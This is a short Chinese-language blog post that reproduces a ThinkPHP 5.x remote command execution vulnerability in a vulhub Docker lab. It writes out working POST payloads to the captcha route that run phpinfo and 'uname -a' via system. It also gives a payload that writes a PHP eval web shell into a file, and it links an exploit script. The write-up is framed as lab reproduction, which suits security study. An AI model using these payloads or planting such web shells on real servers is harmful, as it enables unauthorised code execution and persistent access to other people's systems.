QQ love member No. 3 seed player

know it then do it && APT086&QQ愛安全实验室成员

Thinkphp 5.*_ 全版本命令执行复现

16 Jan 2019 » security

[TOC]

Thinkphp 5.* Command execution

正文

靶机提供:vulhub/thinkphp/5.0.23-rce at master · vulhub/vulhub · GitHub

执行:

docker-compose up -d

打开:http://10.37.129.2:8080/

img

Request:http://10.37.129.2:8080/index.php?s=captcha
POST提交
payload: _method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1

img

Request:http://10.37.129.2:8080/index.php?s=captcha
POST提交
payload: _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=uname -a

img

Request:http://10.37.129.2:8080/index.php?s=captcha
POST提交
payload: _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo '404<?php @eval($_POST[cmd]);?>' >> hakcer.php

img

[九世大佬利用脚本:thinkphp_5._Remote Execution.py](https://github.com/ppbibo/Information-Security-Personnel-Tools/blob/master/thinkphp_5._Remote Code Execution.py)

img

# 测试完成后,删除整个环境.
docker-compose down

参考九世大佬

参考陌航哥哥